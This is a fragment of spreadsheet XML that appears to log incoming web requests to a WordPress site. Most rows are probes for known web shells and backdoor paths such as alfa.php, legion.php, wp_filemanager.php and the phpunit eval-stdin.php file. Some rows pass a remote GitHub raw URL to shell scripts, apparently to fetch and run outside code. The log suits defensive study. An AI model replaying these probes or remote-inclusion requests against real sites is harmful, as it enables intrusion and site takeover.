        <f t="shared" si="81"/>
        <v>wp-content/plugins/press/wp-class.php</v>
      </c>
      <c r="E5246" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5247" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5247" s="1">
        <v>45128.990405092591</v>
      </c>
      <c r="B5247" t="s">
        <v>1802</v>
      </c>
      <c r="C5247" t="s">
        <v>695</v>
      </c>
      <c r="D5247" t="str">
        <f t="shared" si="81"/>
        <v>wp-content/themes/seotheme/mar.php</v>
      </c>
      <c r="E5247" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5248" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5248" s="1">
        <v>45128.989884259259</v>
      </c>
      <c r="B5248" t="s">
        <v>1802</v>
      </c>
      <c r="C5248" t="s">
        <v>695</v>
      </c>
      <c r="D5248" t="str">
        <f t="shared" si="81"/>
        <v>wp-content/themes/seotheme/mar.php</v>
      </c>
      <c r="E5248" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5249" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5249" s="1">
        <v>45128.989374999997</v>
      </c>
      <c r="B5249" t="s">
        <v>1802</v>
      </c>
      <c r="C5249" t="s">
        <v>1574</v>
      </c>
      <c r="D5249" t="str">
        <f t="shared" si="81"/>
        <v>.well-known/pki-validation/moon.php</v>
      </c>
      <c r="E5249" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5250" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5250" s="1">
        <v>45128.75854166667</v>
      </c>
      <c r="B5250" t="s">
        <v>1409</v>
      </c>
      <c r="C5250" t="s">
        <v>1547</v>
      </c>
      <c r="D5250" t="str">
        <f t="shared" ref="D5250:D5313" si="82">MID(C5250,FIND("#", SUBSTITUTE(C5250, "/", "#", 3))+1,LEN(C5250)-FIND("#", SUBSTITUTE(C5250, "/", "#", 3))+1)</f>
        <v>1index.php</v>
      </c>
      <c r="E5250" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5251" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5251" s="1">
        <v>45128.758356481485</v>
      </c>
      <c r="B5251" t="s">
        <v>1409</v>
      </c>
      <c r="C5251" t="s">
        <v>1547</v>
      </c>
      <c r="D5251" t="str">
        <f t="shared" si="82"/>
        <v>1index.php</v>
      </c>
      <c r="E5251" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5252" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5252" s="1">
        <v>45128.758333333331</v>
      </c>
      <c r="B5252" t="s">
        <v>1409</v>
      </c>
      <c r="C5252" t="s">
        <v>1091</v>
      </c>
      <c r="D5252" t="str">
        <f t="shared" si="82"/>
        <v>admin.php</v>
      </c>
      <c r="E5252" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5253" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5253" s="1">
        <v>45128.758136574077</v>
      </c>
      <c r="B5253" t="s">
        <v>1409</v>
      </c>
      <c r="C5253" t="s">
        <v>1091</v>
      </c>
      <c r="D5253" t="str">
        <f t="shared" si="82"/>
        <v>admin.php</v>
      </c>
      <c r="E5253" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5254" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5254" s="1">
        <v>45128.757986111108</v>
      </c>
      <c r="B5254" t="s">
        <v>1409</v>
      </c>
      <c r="C5254" t="s">
        <v>1545</v>
      </c>
      <c r="D5254" t="str">
        <f t="shared" si="82"/>
        <v>wp-content/plugins/press/wp-class.php</v>
      </c>
      <c r="E5254" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5255" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5255" s="1">
        <v>45128.757870370369</v>
      </c>
      <c r="B5255" t="s">
        <v>1409</v>
      </c>
      <c r="C5255" t="s">
        <v>1545</v>
      </c>
      <c r="D5255" t="str">
        <f t="shared" si="82"/>
        <v>wp-content/plugins/press/wp-class.php</v>
      </c>
      <c r="E5255" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5256" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5256" s="1">
        <v>45128.757581018515</v>
      </c>
      <c r="B5256" t="s">
        <v>1409</v>
      </c>
      <c r="C5256" t="s">
        <v>872</v>
      </c>
      <c r="D5256" t="str">
        <f t="shared" si="82"/>
        <v>wp-content/themes/seotheme/mar.php</v>
      </c>
      <c r="E5256" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5257" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5257" s="1">
        <v>45128.7575462963</v>
      </c>
      <c r="B5257" t="s">
        <v>1409</v>
      </c>
      <c r="C5257" t="s">
        <v>872</v>
      </c>
      <c r="D5257" t="str">
        <f t="shared" si="82"/>
        <v>wp-content/themes/seotheme/mar.php</v>
      </c>
      <c r="E5257" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5258" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5258" s="1">
        <v>45128.757511574076</v>
      </c>
      <c r="B5258" t="s">
        <v>1409</v>
      </c>
      <c r="C5258" t="s">
        <v>1549</v>
      </c>
      <c r="D5258" t="str">
        <f t="shared" si="82"/>
        <v>.well-known/pki-validation/moon.php</v>
      </c>
      <c r="E5258" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5259" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5259" s="1">
        <v>45128.517106481479</v>
      </c>
      <c r="B5259" t="s">
        <v>1295</v>
      </c>
      <c r="C5259" t="s">
        <v>368</v>
      </c>
      <c r="D5259" t="str">
        <f t="shared" si="82"/>
        <v>?of=1</v>
      </c>
      <c r="E5259" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5260" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5260" s="1">
        <v>45128.076967592591</v>
      </c>
      <c r="B5260" t="s">
        <v>1803</v>
      </c>
      <c r="C5260" t="s">
        <v>1794</v>
      </c>
      <c r="D5260" t="str">
        <f t="shared" si="82"/>
        <v>wp-content/plugins/hellopress/wp_filemanager.php</v>
      </c>
      <c r="E5260" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5261" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5261" s="1">
        <v>45128.076909722222</v>
      </c>
      <c r="B5261" t="s">
        <v>1803</v>
      </c>
      <c r="C5261" t="s">
        <v>1794</v>
      </c>
      <c r="D5261" t="str">
        <f t="shared" si="82"/>
        <v>wp-content/plugins/hellopress/wp_filemanager.php</v>
      </c>
      <c r="E5261" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5262" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5262" s="1">
        <v>45128.076574074075</v>
      </c>
      <c r="B5262" t="s">
        <v>1803</v>
      </c>
      <c r="C5262" t="s">
        <v>41</v>
      </c>
      <c r="D5262" t="str">
        <f t="shared" si="82"/>
        <v>wp-content/themes/seotheme/db.php?u</v>
      </c>
      <c r="E5262" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5263" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5263" s="1">
        <v>45128.07644675926</v>
      </c>
      <c r="B5263" t="s">
        <v>1803</v>
      </c>
      <c r="C5263" t="s">
        <v>41</v>
      </c>
      <c r="D5263" t="str">
        <f t="shared" si="82"/>
        <v>wp-content/themes/seotheme/db.php?u</v>
      </c>
      <c r="E5263" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5264" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5264" s="1">
        <v>45127.812928240739</v>
      </c>
      <c r="B5264" t="s">
        <v>1409</v>
      </c>
      <c r="C5264" t="s">
        <v>1804</v>
      </c>
      <c r="D5264" t="str">
        <f t="shared" si="82"/>
        <v>wp-content/plugins/rpobm/ng.php</v>
      </c>
      <c r="E5264" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5265" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5265" s="1">
        <v>45127.812893518516</v>
      </c>
      <c r="B5265" t="s">
        <v>1409</v>
      </c>
      <c r="C5265" t="s">
        <v>1804</v>
      </c>
      <c r="D5265" t="str">
        <f t="shared" si="82"/>
        <v>wp-content/plugins/rpobm/ng.php</v>
      </c>
      <c r="E5265" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5266" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5266" s="1">
        <v>45127.812835648147</v>
      </c>
      <c r="B5266" t="s">
        <v>1409</v>
      </c>
      <c r="C5266" t="s">
        <v>1805</v>
      </c>
      <c r="D5266" t="str">
        <f t="shared" si="82"/>
        <v>wp-content/uploads/2022/12/core.php</v>
      </c>
      <c r="E5266" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5267" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5267" s="1">
        <v>45127.812800925924</v>
      </c>
      <c r="B5267" t="s">
        <v>1409</v>
      </c>
      <c r="C5267" t="s">
        <v>1805</v>
      </c>
      <c r="D5267" t="str">
        <f t="shared" si="82"/>
        <v>wp-content/uploads/2022/12/core.php</v>
      </c>
      <c r="E5267" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5268" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5268" s="1">
        <v>45127.812199074076</v>
      </c>
      <c r="B5268" t="s">
        <v>1409</v>
      </c>
      <c r="C5268" t="s">
        <v>266</v>
      </c>
      <c r="D5268" t="str">
        <f t="shared" si="82"/>
        <v>wp-content/plugins/fix/up.php</v>
      </c>
      <c r="E5268" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5269" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5269" s="1">
        <v>45127.812071759261</v>
      </c>
      <c r="B5269" t="s">
        <v>1409</v>
      </c>
      <c r="C5269" t="s">
        <v>266</v>
      </c>
      <c r="D5269" t="str">
        <f t="shared" si="82"/>
        <v>wp-content/plugins/fix/up.php</v>
      </c>
      <c r="E5269" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5270" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5270" s="1">
        <v>45127.811388888891</v>
      </c>
      <c r="B5270" t="s">
        <v>1409</v>
      </c>
      <c r="C5270" t="s">
        <v>1806</v>
      </c>
      <c r="D5270" t="str">
        <f t="shared" si="82"/>
        <v>wp-content/plugins/background-image-cropper/ups.php</v>
      </c>
      <c r="E5270" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5271" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5271" s="1">
        <v>45127.811331018522</v>
      </c>
      <c r="B5271" t="s">
        <v>1409</v>
      </c>
      <c r="C5271" t="s">
        <v>1806</v>
      </c>
      <c r="D5271" t="str">
        <f t="shared" si="82"/>
        <v>wp-content/plugins/background-image-cropper/ups.php</v>
      </c>
      <c r="E5271" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5272" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5272" s="1">
        <v>45127.811261574076</v>
      </c>
      <c r="B5272" t="s">
        <v>1409</v>
      </c>
      <c r="C5272" t="s">
        <v>1807</v>
      </c>
      <c r="D5272" t="str">
        <f t="shared" si="82"/>
        <v>wp-includes/Requests/about.php</v>
      </c>
      <c r="E5272" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5273" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5273" s="1">
        <v>45127.811226851853</v>
      </c>
      <c r="B5273" t="s">
        <v>1409</v>
      </c>
      <c r="C5273" t="s">
        <v>1807</v>
      </c>
      <c r="D5273" t="str">
        <f t="shared" si="82"/>
        <v>wp-includes/Requests/about.php</v>
      </c>
      <c r="E5273" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5274" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5274" s="1">
        <v>45127.811122685183</v>
      </c>
      <c r="B5274" t="s">
        <v>1409</v>
      </c>
      <c r="C5274" t="s">
        <v>1808</v>
      </c>
      <c r="D5274" t="str">
        <f t="shared" si="82"/>
        <v>wp-content/content.php</v>
      </c>
      <c r="E5274" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5275" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5275" s="1">
        <v>45127.81108796296</v>
      </c>
      <c r="B5275" t="s">
        <v>1409</v>
      </c>
      <c r="C5275" t="s">
        <v>1808</v>
      </c>
      <c r="D5275" t="str">
        <f t="shared" si="82"/>
        <v>wp-content/content.php</v>
      </c>
      <c r="E5275" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5276" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5276" s="1">
        <v>45127.811076388891</v>
      </c>
      <c r="B5276" t="s">
        <v>1409</v>
      </c>
      <c r="C5276" t="s">
        <v>1809</v>
      </c>
      <c r="D5276" t="str">
        <f t="shared" si="82"/>
        <v>wp-content/plugins/revslider/includes/external/page/defaul1.php</v>
      </c>
      <c r="E5276" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5277" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5277" s="1">
        <v>45127.811041666668</v>
      </c>
      <c r="B5277" t="s">
        <v>1409</v>
      </c>
      <c r="C5277" t="s">
        <v>1809</v>
      </c>
      <c r="D5277" t="str">
        <f t="shared" si="82"/>
        <v>wp-content/plugins/revslider/includes/external/page/defaul1.php</v>
      </c>
      <c r="E5277" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5278" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5278" s="1">
        <v>45127.810960648145</v>
      </c>
      <c r="B5278" t="s">
        <v>1409</v>
      </c>
      <c r="C5278" t="s">
        <v>1810</v>
      </c>
      <c r="D5278" t="str">
        <f t="shared" si="82"/>
        <v>wp-admin/css/colors/class.api.php</v>
      </c>
      <c r="E5278" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5279" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5279" s="1">
        <v>45127.81077546296</v>
      </c>
      <c r="B5279" t="s">
        <v>1409</v>
      </c>
      <c r="C5279" t="s">
        <v>1810</v>
      </c>
      <c r="D5279" t="str">
        <f t="shared" si="82"/>
        <v>wp-admin/css/colors/class.api.php</v>
      </c>
      <c r="E5279" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5280" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5280" s="1">
        <v>45127.718495370369</v>
      </c>
      <c r="B5280" t="s">
        <v>1811</v>
      </c>
      <c r="C5280" t="s">
        <v>41</v>
      </c>
      <c r="D5280" t="str">
        <f t="shared" si="82"/>
        <v>wp-content/themes/seotheme/db.php?u</v>
      </c>
      <c r="E5280" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5281" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5281" s="1">
        <v>45127.718344907407</v>
      </c>
      <c r="B5281" t="s">
        <v>1811</v>
      </c>
      <c r="C5281" t="s">
        <v>41</v>
      </c>
      <c r="D5281" t="str">
        <f t="shared" si="82"/>
        <v>wp-content/themes/seotheme/db.php?u</v>
      </c>
      <c r="E5281" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5282" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5282" s="1">
        <v>45127.614884259259</v>
      </c>
      <c r="B5282" t="s">
        <v>1812</v>
      </c>
      <c r="C5282" t="s">
        <v>1813</v>
      </c>
      <c r="D5282" t="str">
        <f t="shared" si="82"/>
        <v>wp-content/plugins/wpdiscuz/themes/default/style-rtl.css</v>
      </c>
      <c r="E5282" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5283" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5283" s="1">
        <v>45127.614745370367</v>
      </c>
      <c r="B5283" t="s">
        <v>1812</v>
      </c>
      <c r="C5283" t="s">
        <v>1815</v>
      </c>
      <c r="D5283" t="str">
        <f t="shared" si="82"/>
        <v>wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php</v>
      </c>
      <c r="E5283" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5284" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5284" s="1">
        <v>45127.614664351851</v>
      </c>
      <c r="B5284" t="s">
        <v>1812</v>
      </c>
      <c r="C5284" t="s">
        <v>1816</v>
      </c>
      <c r="D5284" t="str">
        <f t="shared" si="82"/>
        <v>vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</v>
      </c>
      <c r="E5284" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5285" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5285" s="1">
        <v>45127.614340277774</v>
      </c>
      <c r="B5285" t="s">
        <v>1812</v>
      </c>
      <c r="C5285" t="s">
        <v>1817</v>
      </c>
      <c r="D5285" t="str">
        <f t="shared" si="82"/>
        <v>upload.php</v>
      </c>
      <c r="E5285" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5286" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5286" s="1">
        <v>45127.614340277774</v>
      </c>
      <c r="B5286" t="s">
        <v>1812</v>
      </c>
      <c r="C5286" t="s">
        <v>1818</v>
      </c>
      <c r="D5286" t="str">
        <f t="shared" si="82"/>
        <v>fox-index.php</v>
      </c>
      <c r="E5286" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5287" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5287" s="1">
        <v>45127.614317129628</v>
      </c>
      <c r="B5287" t="s">
        <v>1812</v>
      </c>
      <c r="C5287" t="s">
        <v>1818</v>
      </c>
      <c r="D5287" t="str">
        <f t="shared" si="82"/>
        <v>fox-index.php</v>
      </c>
      <c r="E5287" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5288" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5288" s="1">
        <v>45127.61409722222</v>
      </c>
      <c r="B5288" t="s">
        <v>1812</v>
      </c>
      <c r="C5288" t="s">
        <v>887</v>
      </c>
      <c r="D5288" t="str">
        <f t="shared" si="82"/>
        <v>upload.php</v>
      </c>
      <c r="E5288" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5289" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5289" s="1">
        <v>45127.613969907405</v>
      </c>
      <c r="B5289" t="s">
        <v>1812</v>
      </c>
      <c r="C5289" t="s">
        <v>1818</v>
      </c>
      <c r="D5289" t="str">
        <f t="shared" si="82"/>
        <v>fox-index.php</v>
      </c>
      <c r="E5289" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5290" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5290" s="1">
        <v>45127.613888888889</v>
      </c>
      <c r="B5290" t="s">
        <v>1812</v>
      </c>
      <c r="C5290" t="s">
        <v>887</v>
      </c>
      <c r="D5290" t="str">
        <f t="shared" si="82"/>
        <v>upload.php</v>
      </c>
      <c r="E5290" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5291" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5291" s="1">
        <v>45127.61383101852</v>
      </c>
      <c r="B5291" t="s">
        <v>1812</v>
      </c>
      <c r="C5291" t="s">
        <v>887</v>
      </c>
      <c r="D5291" t="str">
        <f t="shared" si="82"/>
        <v>upload.php</v>
      </c>
      <c r="E5291" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5292" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5292" s="1">
        <v>45127.613796296297</v>
      </c>
      <c r="B5292" t="s">
        <v>1812</v>
      </c>
      <c r="C5292" t="s">
        <v>888</v>
      </c>
      <c r="D5292" t="str">
        <f t="shared" si="82"/>
        <v>up.php</v>
      </c>
      <c r="E5292" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5293" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5293" s="1">
        <v>45127.61346064815</v>
      </c>
      <c r="B5293" t="s">
        <v>1812</v>
      </c>
      <c r="C5293" t="s">
        <v>937</v>
      </c>
      <c r="D5293" t="str">
        <f t="shared" si="82"/>
        <v>wp-content/mu-plugins/db-safe-mode.php</v>
      </c>
      <c r="E5293" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5294" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5294" s="1">
        <v>45127.613356481481</v>
      </c>
      <c r="B5294" t="s">
        <v>1812</v>
      </c>
      <c r="C5294" t="s">
        <v>934</v>
      </c>
      <c r="D5294" t="str">
        <f t="shared" si="82"/>
        <v>legion.php</v>
      </c>
      <c r="E5294" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5295" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5295" s="1">
        <v>45127.613240740742</v>
      </c>
      <c r="B5295" t="s">
        <v>1812</v>
      </c>
      <c r="C5295" t="s">
        <v>1819</v>
      </c>
      <c r="D5295" t="str">
        <f t="shared" si="82"/>
        <v>wp-content/wp-old-index.php?action=login&amp;pass=-1&amp;submit=</v>
      </c>
      <c r="E5295" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5296" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5296" s="1">
        <v>45127.613182870373</v>
      </c>
      <c r="B5296" t="s">
        <v>1812</v>
      </c>
      <c r="C5296" t="s">
        <v>1820</v>
      </c>
      <c r="D5296" t="str">
        <f t="shared" si="82"/>
        <v>haders.php</v>
      </c>
      <c r="E5296" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5297" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5297" s="1">
        <v>45127.61309027778</v>
      </c>
      <c r="B5297" t="s">
        <v>1812</v>
      </c>
      <c r="C5297" t="s">
        <v>933</v>
      </c>
      <c r="D5297" t="str">
        <f t="shared" si="82"/>
        <v>wp-content/plugins/wpconfig.bak.php?act=sf</v>
      </c>
      <c r="E5297" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5298" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5298" s="1">
        <v>45127.612939814811</v>
      </c>
      <c r="B5298" t="s">
        <v>1812</v>
      </c>
      <c r="C5298" t="s">
        <v>895</v>
      </c>
      <c r="D5298" t="str">
        <f t="shared" si="82"/>
        <v>wp-content/plugins/ubh/up.php</v>
      </c>
      <c r="E5298" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5299" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5299" s="1">
        <v>45127.612662037034</v>
      </c>
      <c r="B5299" t="s">
        <v>1812</v>
      </c>
      <c r="C5299" t="s">
        <v>1821</v>
      </c>
      <c r="D5299" t="str">
        <f t="shared" si="82"/>
        <v>wp-content/plugins/config.bak.php</v>
      </c>
      <c r="E5299" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5300" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5300" s="1">
        <v>45127.612546296295</v>
      </c>
      <c r="B5300" t="s">
        <v>1812</v>
      </c>
      <c r="C5300" t="s">
        <v>935</v>
      </c>
      <c r="D5300" t="str">
        <f t="shared" si="82"/>
        <v>wp-content/themes/config.bak.php</v>
      </c>
      <c r="E5300" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5301" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5301" s="1">
        <v>45127.612326388888</v>
      </c>
      <c r="B5301" t="s">
        <v>1812</v>
      </c>
      <c r="C5301" t="s">
        <v>1822</v>
      </c>
      <c r="D5301" t="str">
        <f t="shared" si="82"/>
        <v>wp-admin/config.bak.php</v>
      </c>
      <c r="E5301" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5302" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5302" s="1">
        <v>45127.612199074072</v>
      </c>
      <c r="B5302" t="s">
        <v>1812</v>
      </c>
      <c r="C5302" t="s">
        <v>936</v>
      </c>
      <c r="D5302" t="str">
        <f t="shared" si="82"/>
        <v>config.bak.php</v>
      </c>
      <c r="E5302" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5303" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5303" s="1">
        <v>45127.612083333333</v>
      </c>
      <c r="B5303" t="s">
        <v>1812</v>
      </c>
      <c r="C5303" t="s">
        <v>1823</v>
      </c>
      <c r="D5303" t="str">
        <f t="shared" si="82"/>
        <v>old-index.php</v>
      </c>
      <c r="E5303" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5304" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5304" s="1">
        <v>45127.611840277779</v>
      </c>
      <c r="B5304" t="s">
        <v>1812</v>
      </c>
      <c r="C5304" t="s">
        <v>1824</v>
      </c>
      <c r="D5304" t="str">
        <f t="shared" si="82"/>
        <v>wp-includes/fonts/css.php</v>
      </c>
      <c r="E5304" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5305" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5305" s="1">
        <v>45127.611678240741</v>
      </c>
      <c r="B5305" t="s">
        <v>1812</v>
      </c>
      <c r="C5305" t="s">
        <v>1825</v>
      </c>
      <c r="D5305" t="str">
        <f t="shared" si="82"/>
        <v>wp-1ogin_bak.php</v>
      </c>
      <c r="E5305" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5306" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5306" s="1">
        <v>45127.611527777779</v>
      </c>
      <c r="B5306" t="s">
        <v>1812</v>
      </c>
      <c r="C5306" t="s">
        <v>1826</v>
      </c>
      <c r="D5306" t="str">
        <f t="shared" si="82"/>
        <v>wp-content/wp-1ogin_bak.php</v>
      </c>
      <c r="E5306" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5307" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5307" s="1">
        <v>45127.611400462964</v>
      </c>
      <c r="B5307" t="s">
        <v>1812</v>
      </c>
      <c r="C5307" t="s">
        <v>1827</v>
      </c>
      <c r="D5307" t="str">
        <f t="shared" si="82"/>
        <v>cindex.php</v>
      </c>
      <c r="E5307" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5308" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5308" s="1">
        <v>45127.611284722225</v>
      </c>
      <c r="B5308" t="s">
        <v>1812</v>
      </c>
      <c r="C5308" t="s">
        <v>939</v>
      </c>
      <c r="D5308" t="str">
        <f t="shared" si="82"/>
        <v>wp-booking.php</v>
      </c>
      <c r="E5308" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5309" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5309" s="1">
        <v>45127.611192129632</v>
      </c>
      <c r="B5309" t="s">
        <v>1812</v>
      </c>
      <c r="C5309" t="s">
        <v>879</v>
      </c>
      <c r="D5309" t="str">
        <f t="shared" si="82"/>
        <v>alfa.php</v>
      </c>
      <c r="E5309" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5310" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5310" s="1">
        <v>45127.611111111109</v>
      </c>
      <c r="B5310" t="s">
        <v>1812</v>
      </c>
      <c r="C5310" t="s">
        <v>1828</v>
      </c>
      <c r="D5310" t="str">
        <f t="shared" si="82"/>
        <v>alfindex.php</v>
      </c>
      <c r="E5310" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5311" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5311" s="1">
        <v>45127.610972222225</v>
      </c>
      <c r="B5311" t="s">
        <v>1812</v>
      </c>
      <c r="C5311" t="s">
        <v>1829</v>
      </c>
      <c r="D5311" t="str">
        <f t="shared" si="82"/>
        <v>th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1</v>
      </c>
      <c r="E5311" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5312" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5312" s="1">
        <v>45127.610833333332</v>
      </c>
      <c r="B5312" t="s">
        <v>1812</v>
      </c>
      <c r="C5312" t="s">
        <v>1830</v>
      </c>
      <c r="D5312" t="str">
        <f t="shared" si="82"/>
        <v>larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1</v>
      </c>
      <c r="E5312" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5313" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5313" s="1">
        <v>45127.610717592594</v>
      </c>
      <c r="B5313" t="s">
        <v>1812</v>
      </c>
      <c r="C5313" t="s">
        <v>1831</v>
      </c>
      <c r="D5313" t="str">
        <f t="shared" si="82"/>
        <v>wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1</v>
      </c>
      <c r="E5313" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5314" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5314" s="1">
        <v>45127.610520833332</v>
      </c>
      <c r="B5314" t="s">
        <v>1812</v>
      </c>
      <c r="C5314" t="s">
        <v>1832</v>
      </c>
      <c r="D5314" t="str">
        <f t="shared" ref="D5314:D5377" si="83">MID(C5314,FIND("#", SUBSTITUTE(C5314, "/", "#", 3))+1,LEN(C5314)-FIND("#", SUBSTITUTE(C5314, "/", "#", 3))+1)</f>
        <v>wp-content/plugins/ioptimization/IOptimize.php?rchk</v>
      </c>
      <c r="E5314" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5315" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5315" s="1">
        <v>45127.610393518517</v>
      </c>
      <c r="B5315" t="s">
        <v>1812</v>
      </c>
      <c r="C5315" t="s">
        <v>1833</v>
      </c>
      <c r="D5315" t="str">
        <f t="shared" si="83"/>
        <v>wp-content/db_cache.php</v>
      </c>
      <c r="E5315" t="s">
        <v>1814</v>
      </c>
    </row>
